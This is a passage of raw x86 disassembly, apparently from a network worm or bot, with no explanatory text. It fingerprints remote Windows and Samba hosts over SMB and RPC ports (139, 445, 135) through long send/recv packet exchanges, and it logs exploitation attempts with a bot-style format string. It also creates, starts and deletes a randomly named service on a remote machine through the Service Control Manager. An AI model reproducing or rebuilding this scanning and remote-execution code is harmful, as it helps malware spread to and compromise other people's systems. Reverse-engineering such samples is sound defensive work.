cmp eax, 0FFFFFFFFh
jnz short loc_404398
loc_404392: ; CODE XREF: sub_404105+2A7�j
; sub_404105+2D3�j
push esi
jmp loc_40449C
; ---------------------------------------------------------------------------
loc_404398: ; CODE XREF: sub_404105+28B�j
xor ebx, ebx
push ebx
push 48h
push offset byte_43BCE8
push esi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz short loc_404392
push ebx
lea eax, [ebp+var_3020]
push 1000h
push eax
push esi
call dword_456F38 ; recv
add edi, 30h
push ebx
lea eax, [ebp+var_1020]
push edi
push eax
push esi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz short loc_404392
movzx eax, word_443986
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz short loc_40447E
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], ebx
mov ecx, [ecx]
jz short loc_404452
cmp [ebp+arg_BC], ebx
jnz short loc_40445A
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_404452: ; CODE XREF: sub_404105+321�j
cmp [ebp+arg_BC], ebx
jz short loc_40447E
loc_40445A: ; CODE XREF: sub_404105+329�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 1Ch
loc_40447E: ; CODE XREF: sub_404105+2FA�j
; sub_404105+353�j
push ebx
lea eax, [ebp+var_3020]
push 1000h
push eax
push [ebp+var_8]
call dword_456F38 ; recv
push [ebp+var_8]
cmp eax, 0FFFFFFFFh
jnz short loc_4044A9
loc_40449C: ; CODE XREF: sub_404105+28E�j
call dword_456FD0 ; closesocket
loc_4044A2: ; CODE XREF: sub_404105+40�j
; sub_404105+4A�j ...
xor eax, eax
loc_4044A4: ; CODE XREF: sub_404105+3B7�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4044A9: ; CODE XREF: sub_404105+395�j
call dword_456FD0 ; closesocket
lea eax, [ebp+arg_8]
push eax
call sub_401E8E
xor eax, eax
pop ecx
inc eax
jmp short loc_4044A4
sub_404105 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044BE proc near ; CODE XREF: sub_4044F6+B24�p
; sub_4044F6+B48�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_4044EC
loc_4044CF: ; CODE XREF: sub_4044BE+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_42A450
add esp, 0Ch
test eax, eax
jz short loc_4044F2
inc esi
cmp esi, edi
jl short loc_4044CF
loc_4044EC: ; CODE XREF: sub_4044BE+F�j
xor al, al
loc_4044EE: ; CODE XREF: sub_4044BE+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4044F2: ; CODE XREF: sub_4044BE+27�j
mov al, 1
jmp short loc_4044EE
sub_4044BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044F6 proc near ; CODE XREF: sub_403B6C+16�p
; sub_403B6C+2B�p ...
var_263C = byte ptr -263Ch
var_243C = byte ptr -243Ch
var_243B = byte ptr -243Bh
var_243A = byte ptr -243Ah
var_143C = byte ptr -143Ch
var_1433 = dword ptr -1433h
var_1420 = dword ptr -1420h
var_141C = dword ptr -141Ch
var_1411 = word ptr -1411h
var_140D = byte ptr -140Dh
var_13FA = byte ptr -13FAh
var_13E4 = dword ptr -13E4h
var_43C = byte ptr -43Ch
var_23C = byte ptr -23Ch
var_1CC = byte ptr -1CCh
var_140 = byte ptr -140h
var_3C = byte ptr -3Ch
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_A = dword ptr -0Ah
var_6 = dword ptr -6
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 263Ch
call sub_429A90
mov eax, [ebp+arg_4]
push ebx
push esi
dec eax
push edi
jz loc_405091
dec eax
jz loc_40506B
dec eax
jz loc_404DA7
dec eax
jz loc_404F58
dec eax
jz loc_404DAE
dec eax
jz loc_404745
dec eax
jnz loc_404DA7
push 6
push 1
push 2
call dword_456FB0 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz loc_404DA7
xor ebx, ebx
push 10h
lea eax, [ebp+var_20]
push ebx
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_20], 2
push 8Bh
call dword_456F18 ; ntohs
push [ebp+arg_0]
mov [ebp+var_1E], ax
call sub_41E326
pop ecx
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_456E9C ; connect
cmp eax, edi
jz loc_404DA7
push ebx
push 48h
push offset unk_43C298
push esi
call dword_456F6C ; send
cmp eax, edi
jnz short loc_4045B6
loc_4045B0: ; CODE XREF: sub_4044F6+924�j
push esi
jmp loc_404E94
; ---------------------------------------------------------------------------
loc_4045B6: ; CODE XREF: sub_4044F6+B8�j
mov esi, 2000h
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
cmp eax, edi
jz loc_404E91
push ebx
push 33h
push offset dword_43C2E4
push [ebp+arg_4]
call dword_456F6C ; send
cmp eax, edi
jz loc_404E91
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
cmp eax, edi
jz loc_404E91
push ebx
push 4Ch
push offset dword_43C318
push [ebp+arg_4]
call dword_456F6C ; send
cmp eax, edi
jz loc_404E91
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
cmp eax, edi
jz loc_404E91
lea esi, [eax-2]
mov [ebp+arg_0], ebx
cmp esi, ebx
jle loc_404EF0
lea edi, [ebp+esi+var_243B]
loc_404650: ; CODE XREF: sub_4044F6+19C�j
cmp [ebp+arg_0], 4
jge loc_404EF0
cmp [edi-1], bl
jnz short loc_40468E
mov eax, [ebp+arg_0]
sub eax, ebx
jz short loc_40467C
dec eax
jz short loc_404674
dec eax
jnz short loc_40468B
lea eax, [ebp+var_43C]
jmp short loc_404682
; ---------------------------------------------------------------------------
loc_404674: ; CODE XREF: sub_4044F6+171�j
lea eax, [ebp+var_23C]
jmp short loc_404682
; ---------------------------------------------------------------------------
loc_40467C: ; CODE XREF: sub_4044F6+16E�j
lea eax, [ebp+var_263C]
loc_404682: ; CODE XREF: sub_4044F6+17C�j
; sub_4044F6+184�j
push edi
push eax
call sub_42A500
pop ecx
pop ecx
loc_40468B: ; CODE XREF: sub_4044F6+174�j
inc [ebp+arg_0]
loc_40468E: ; CODE XREF: sub_4044F6+167�j
dec esi
dec edi
cmp esi, ebx
jg short loc_404650
jmp loc_404EF0
; ---------------------------------------------------------------------------
loc_404699: ; CODE XREF: sub_4044F6+A18�j
lea eax, [ebp+var_43C]
push eax
push offset aServicePack1 ; "*Service Pack 1*"
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz short loc_4046B4
push 7
jmp short loc_404720
; ---------------------------------------------------------------------------
loc_4046B4: ; CODE XREF: sub_4044F6+1B8�j
lea eax, [ebp+var_43C]
push eax
push offset aServicePack2 ; "*Service Pack 2*"
call sub_427A85
neg eax
sbb eax, eax
pop ecx
and eax, 2
pop ecx
add eax, 6
jmp loc_404DA9
; ---------------------------------------------------------------------------
loc_4046D6: ; CODE XREF: sub_4044F6+A1E�j
lea eax, [ebp+var_23C]
push eax
push offset aNtLanManager_ ; "NT LAN Manager *.*"
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz loc_404F19
xor eax, eax
inc eax
jmp loc_404DA9
; ---------------------------------------------------------------------------
loc_4046F9: ; CODE XREF: sub_4044F6+A3F�j
; sub_4044F6+A55�j
lea eax, [ebp+var_23C]
push eax
push esi
call sub_427A85
pop ecx
test eax, eax
pop ecx
jz short loc_404726
lea eax, [ebp+var_43C]
push eax
push offset aWindows5_1 ; "Windows 5.1"
call edi ; dword_437174
test eax, eax
jnz short loc_404726
loc_40471E: ; CODE XREF: sub_4044F6+B96�j
push 3
loc_404720: ; CODE XREF: sub_4044F6+1BC�j
; sub_4044F6+899�j ...
pop eax
jmp loc_404DA9
; ---------------------------------------------------------------------------
loc_404726: ; CODE XREF: sub_4044F6+214�j
; sub_4044F6+226�j
lea eax, [ebp+var_23C]
push eax
push offset aSamba ; "Samba *"
call sub_427A85
neg eax
pop ecx
sbb eax, eax
pop ecx
and eax, 9
jmp loc_404DA9
; ---------------------------------------------------------------------------
loc_404745: ; CODE XREF: sub_4044F6+37�j
lea eax, [ebp+var_1CC]
xor ebx, ebx
push eax
push 2
mov [ebp+var_1], bl
mov byte ptr [ebp+arg_4+3], bl
call dword_4372B4 ; WSAStartup
test eax, eax
jnz loc_404DA7
push 6
push 1
push 2
call dword_4372B8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_404DA7
push [ebp+arg_0]
mov [ebp+var_20], 2
call dword_4372BC ; inet_addr
push 1BDh
mov [ebp+var_1C], eax
call dword_4372C0 ; ntohs
mov [ebp+var_1E], ax
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_4372C8 ; connect
cmp eax, 0FFFFFFFFh
jz loc_404DA0
mov esi, dword_4372CC
push ebx
push 89h
push offset dword_43C3B8
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 1
jl loc_404DA0
push ebx
push 0BDh
push offset dword_43C448
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
movzx eax, [ebp+var_1411]
push 1Bh
lea eax, [ebp+eax+var_140D]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_429C40
push 0Bh
lea eax, [ebp+var_3C]
push offset aWindows5_1 ; "Windows 5.1"
push eax
call sub_42A450
add esp, 18h
test eax, eax
jnz short loc_404855
mov byte ptr [ebp+arg_4+3], 1
loc_404855: ; CODE XREF: sub_4044F6+359�j
mov eax, [ebp+var_141C]
push 2
mov [ebp+var_6], eax
lea eax, [ebp+var_6]
push eax
push offset dword_43C528
call sub_429350
add esp, 0Ch
push ebx
push 111h
push offset dword_43C508
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
push ebx
push 6Fh
push offset dword_43C620
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
mov eax, [ebp+var_141C]
push 2
mov [ebp+var_6], eax
lea eax, [ebp+var_6]
push eax
push offset dword_43C6B0
call sub_429350
add esp, 0Ch
push ebx
push 3Bh
push offset dword_43C690
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DA0
mov eax, [ebp+var_1420]
push 2
mov [ebp+var_A], eax
lea eax, [ebp+var_A]
push eax
push offset dword_43C754
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C758
call sub_429350
add esp, 18h
push ebx
push 5Fh
push offset dword_43C738
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Dh
jl loc_404DA0
cmp [ebp+var_1433], 0C0000022h
jnz short loc_4049A1
cmp byte ptr [ebp+arg_4+3], bl
jz short loc_4049A1
mov [ebp+var_1], 1
loc_4049A1: ; CODE XREF: sub_4044F6+4A0�j
; sub_4044F6+4A5�j
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43C6EC
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C6F0
call sub_429350
add esp, 18h
push ebx
push 60h
push offset dword_43C6D0
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DA0
mov eax, [ebp-1412h]
push 2
mov [ebp+var_10], eax
lea eax, [ebp+var_A]
push eax
push offset dword_43C7B4
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C7B8
call sub_429350
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43C7C1
call sub_429350
add esp, 24h
push ebx
push 243h
push offset dword_43C798
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DA0
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43C9FC
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43CA00
call sub_429350
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43CA09
call sub_429350
add esp, 24h
push ebx
push 3Fh
push offset dword_43C9E0
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DA0
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43CA3C
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43CA40
call sub_429350
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43CA49
call sub_429350
add esp, 24h
push ebx
push 0A7h
push offset dword_43CA20
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DA0
push ebx
push 3Fh
push offset dword_43C9E0
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 42h
jl loc_404DA0
cmp [ebp+var_13FA], 3
jnz short loc_404BA3
cmp byte ptr [ebp+arg_4+3], bl
jz short loc_404BA3
mov [ebp+var_1], 1
loc_404BA3: ; CODE XREF: sub_4044F6+6A2�j
; sub_4044F6+6A7�j
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43C6EC
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C6F0
call sub_429350
add esp, 18h
push ebx
push 60h
push offset dword_43C6D0
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DA0
mov eax, [ebp-1412h]
push 2
mov [ebp+var_10], eax
lea eax, [ebp+var_A]
push eax
push offset dword_43C7B4
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C7B8
call sub_429350
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43C7C1
call sub_429350
add esp, 24h
push ebx
push 243h
push offset dword_43C798
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DA0
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43C9FC
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43CA00
call sub_429350
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43CA09
call sub_429350
add esp, 24h
push ebx
push 3Fh
push offset dword_43C9E0
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DA0
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43CAE4
call sub_429350
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43CAE8
call sub_429350
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43CAF1
call sub_429350
add esp, 24h
push ebx
push 73h
push offset dword_43CAC8
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz short loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 0Ah
jle short loc_404DA0
cmp byte ptr [ebp+var_1433], bl
jnz short loc_404DA0
push ebx
push 3Fh
push offset dword_43C9E0
push edi
call esi ; dword_4372CC
cmp eax, 0FFFFFFFFh
jz short loc_404DA0
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D0 ; recv
cmp eax, 58h
jl short loc_404DA0
cmp byte ptr [ebp+arg_4+3], bl
jz short loc_404DA7
cmp [ebp+var_13E4], 20000h
jnz short loc_404D94
push 5
jmp loc_404720
; ---------------------------------------------------------------------------
loc_404D94: ; CODE XREF: sub_4044F6+895�j
cmp [ebp+var_1], bl
jz short loc_404DA7
push 4
jmp loc_404720
; ---------------------------------------------------------------------------
loc_404DA0: ; CODE XREF: sub_4044F6+2B6�j
; sub_4044F6+2D3�j ...
push edi
call dword_4372D4 ; closesocket
loc_404DA7: ; CODE XREF: sub_4044F6+22�j
; sub_4044F6+3E�j ...
xor eax, eax
loc_404DA9: ; CODE XREF: sub_4044F6+1DB�j
; sub_4044F6+1FE�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404DAE: ; CODE XREF: sub_4044F6+30�j
push 6
push 1
push 2
call dword_456FB0 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_404DA7
xor ebx, ebx
push 10h
lea eax, [ebp+var_20]
push ebx
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_20], 2
push 8Bh
call dword_456F18 ; ntohs
push [ebp+arg_0]
mov [ebp+var_1E], ax
call sub_41E326
pop ecx
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_456E9C ; connect
cmp eax, edi
jz short loc_404DA7
push ebx
push 48h
push offset unk_43C298
push esi
call dword_456F6C ; send
cmp eax, edi
jz loc_4045B0
mov esi, 2000h
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
cmp eax, edi
jz short loc_404E91
push ebx
push 33h
push offset dword_43C2E4
push [ebp+arg_4]
call dword_456F6C ; send
cmp eax, edi
jz short loc_404E91
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
cmp eax, edi
jz short loc_404E91
push ebx
push 4Ch
push offset dword_43C318
push [ebp+arg_4]
call dword_456F6C ; send
cmp eax, edi
jz short loc_404E91
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
cmp eax, edi
jnz short loc_404E9F
loc_404E91: ; CODE XREF: sub_4044F6+D9�j
; sub_4044F6+F2�j ...
push [ebp+arg_4]
loc_404E94: ; CODE XREF: sub_4044F6+BB�j
call dword_456FD0 ; closesocket
jmp loc_404DA7
; ---------------------------------------------------------------------------
loc_404E9F: ; CODE XREF: sub_4044F6+999�j
lea esi, [eax-2]
mov [ebp+arg_0], ebx
cmp esi, ebx
jle short loc_404EF0
lea edi, [ebp+esi+var_243B]
loc_404EB0: ; CODE XREF: sub_4044F6+9F8�j
cmp [ebp+arg_0], 4
jge short loc_404EF0
cmp [edi-1], bl
jnz short loc_404EEA
mov eax, [ebp+arg_0]
sub eax, ebx
jz short loc_404ED8
dec eax
jz short loc_404ED0
dec eax
jnz short loc_404EE7
lea eax, [ebp+var_43C]
jmp short loc_404EDE
; ---------------------------------------------------------------------------
loc_404ED0: ; CODE XREF: sub_4044F6+9CD�j
lea eax, [ebp+var_23C]
jmp short loc_404EDE
; ---------------------------------------------------------------------------
loc_404ED8: ; CODE XREF: sub_4044F6+9CA�j
lea eax, [ebp+var_263C]
loc_404EDE: ; CODE XREF: sub_4044F6+9D8�j
; sub_4044F6+9E0�j
push edi
push eax
call sub_42A500
pop ecx
pop ecx
loc_404EE7: ; CODE XREF: sub_4044F6+9D0�j
inc [ebp+arg_0]
loc_404EEA: ; CODE XREF: sub_4044F6+9C3�j
dec esi
dec edi
cmp esi, ebx
jg short loc_404EB0
loc_404EF0: ; CODE XREF: sub_4044F6+14D�j
; sub_4044F6+15E�j ...
push [ebp+arg_4]
call dword_456FD0 ; closesocket
lea eax, [ebp+var_23C]
push eax
push offset aWindowsServer2 ; "Windows Server 2003 *.*"
call sub_427A85
pop ecx
test eax, eax
pop ecx
jnz loc_404699
jmp loc_4046D6
; ---------------------------------------------------------------------------
loc_404F19: ; CODE XREF: sub_4044F6+1F5�j
lea eax, [ebp+var_23C]
mov esi, offset aWindows2000Lan ; "Windows 2000 LAN Manager*"
push eax
push esi
call sub_427A85
mov edi, dword_437174
pop ecx
test eax, eax
pop ecx
jz loc_4046F9
lea eax, [ebp+var_43C]
push eax
push offset dword_43CB54
call edi ; dword_437174
test eax, eax
jnz loc_4046F9
push 2
jmp loc_404720
; ---------------------------------------------------------------------------
loc_404F58: ; CODE XREF: sub_4044F6+29�j
push [ebp+arg_0]
mov esi, 104h
lea eax, [ebp+var_140]
xor edi, edi
push offset dword_43CB4C
push esi
push eax
xor ebx, ebx
mov [ebp+var_10], edi
call sub_429AEE
push esi
lea eax, [ebp+var_140]
push offset dword_43CB3C
push eax
call sub_429910
add esp, 1Ch
lea eax, [ebp+var_140]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_4], eax
jz loc_405064
mov edi, 186A0h
push edi
call sub_4296E8
mov esi, eax
push edi
push ebx
push esi
call sub_429690
add esp, 10h
lea eax, [ebp+arg_0]
mov edi, dword_437058
push ebx
push eax
push 2710h
push esi
push 48h
push offset dword_43C208
push [ebp+arg_4]
call edi ; dword_437058
cmp byte ptr [esi+2], 0Ch
jnz short loc_405051
lea eax, [ebp+arg_0]
push ebx
push eax
push 2710h
push esi
push 18h
push offset dword_43C254
push [ebp+arg_4]
call edi ; dword_437058
cmp byte ptr [esi+2], 2
jnz short loc_405051
push 10h
push offset dword_43C270
push [ebp+arg_0]
push esi
call sub_4044BE
add esp, 10h
test al, al
jz short loc_405033
cmp [ebp+arg_0], 12Ch
sbb edi, edi
inc edi
inc edi
jmp short loc_405054
; ---------------------------------------------------------------------------
loc_405033: ; CODE XREF: sub_4044F6+B2E�j
push 10h
push offset dword_43C284
push [ebp+arg_0]
push esi
call sub_4044BE
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov edi, eax
jmp short loc_405054
; ---------------------------------------------------------------------------
loc_405051: ; CODE XREF: sub_4044F6+AFA�j
; sub_4044F6+B17�j
mov edi, [ebp+var_10]
loc_405054: ; CODE XREF: sub_4044F6+B3B�j
; sub_4044F6+B59�j
push esi
call sub_429822
pop ecx
push [ebp+arg_4]
call dword_437044 ; CloseHandle
loc_405064: ; CODE XREF: sub_4044F6+ABB�j
mov eax, edi
jmp loc_404DA9
; ---------------------------------------------------------------------------
loc_40506B: ; CODE XREF: sub_4044F6+1B�j
push 3
push 1388h
push [ebp+arg_0]
call dword_456F5C ; inet_addr
push eax
call sub_4022B8
add esp, 0Ch
test eax, eax
jz loc_404DA7
jmp loc_40471E
; ---------------------------------------------------------------------------
loc_405091: ; CODE XREF: sub_4044F6+14�j
push 6
push 1
push 2
call dword_456FB0 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz loc_404DA7
xor ebx, ebx
push 10h
lea eax, [ebp+var_20]
push ebx
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_20], 2
push 87h
call dword_456F18 ; ntohs
push [ebp+arg_0]
mov [ebp+var_1E], ax
call sub_41E326
pop ecx
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_456E9C ; connect
cmp eax, edi
jz loc_4051B0
push ebx
push 48h
push offset dword_43C208
push esi
call dword_456F6C ; send
cmp eax, edi
jz loc_4051B0
mov esi, 2000h
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
cmp eax, edi
jz loc_4051B0
cmp [ebp+var_243A], 0Ch
jnz short loc_4051B0
push ebx
push 18h
push offset dword_43C254
push [ebp+arg_4]
call dword_456F6C ; send
cmp eax, edi
jz short loc_4051B0
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
mov esi, eax
cmp esi, edi
jz short loc_4051B0
cmp [ebp+var_243A], 2
jnz short loc_4051B0
push 10h
push offset dword_43C270
lea eax, [ebp+var_243C]
push esi
push eax
call sub_4044BE
add esp, 10h
test al, al
jz short loc_405190
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_4051B0
; ---------------------------------------------------------------------------
loc_405190: ; CODE XREF: sub_4044F6+C8C�j
push 10h
push offset dword_43C284
lea eax, [ebp+var_243C]
push esi
push eax
call sub_4044BE
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_4051B0: ; CODE XREF: sub_4044F6+BF8�j
; sub_4044F6+C0F�j ...
push [ebp+arg_4]
call dword_456FD0 ; closesocket
mov eax, ebx
jmp loc_404DA9
sub_4044F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4051C0 proc near ; CODE XREF: sub_4053EE+412�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push 0F003Fh
push offset aServicesactive ; "ServicesActive"
push [ebp+arg_4]
call dword_456F08 ; OpenSCManagerA
xor esi, esi
mov [ebp+var_4], eax
cmp eax, esi
jz loc_405326
push [ebp+arg_10]
lea eax, [ebp+var_208]
push [ebp+arg_0]
push [ebp+arg_4]
push offset aSSS_4 ; "%s\\%s\\%s"
push eax
call sub_429A33
add esp, 14h
call sub_429ACC
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
idiv edi
lea eax, [ebp+var_104]
push edx
push offset aDDDDD ; "%d%d%d%d%d"
push eax
call sub_429A33
add esp, 1Ch
lea eax, [ebp+var_208]
mov edi, 0F01FFh
push esi
push esi
push esi
push esi
push esi
push eax
push 1
push 3
push 20h
lea eax, [ebp+var_104]
push edi
push eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_4]
call dword_456F98 ; CreateServiceA
mov ebx, eax
cmp ebx, esi
jnz short loc_405292
push [ebp+var_4]
jmp loc_405320
; ---------------------------------------------------------------------------
loc_405292: ; CODE XREF: sub_4051C0+C8�j
push esi
push esi
push ebx
call dword_456DB0 ; StartServiceA
test eax, eax
jz short loc_4052C6
push 1F4h
call dword_43718C ; Sleep
push ebx
call dword_456E30 ; DeleteService
push [ebp+var_4]
call dword_456DC4 ; CloseServiceHandle
push ebx
loc_4052BB: ; CODE XREF: sub_4051C0+14D�j
call dword_456DC4 ; CloseServiceHandle
xor eax, eax
inc eax
jmp short loc_405328
; ---------------------------------------------------------------------------
loc_4052C6: ; CODE XREF: sub_4051C0+DD�j
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 41Dh
jnz short loc_40530F
push edi
push offset dword_4439B0
push [ebp+var_4]
call dword_456DA8 ; OpenServiceA
mov edi, eax
cmp edi, esi
jz short loc_40530F
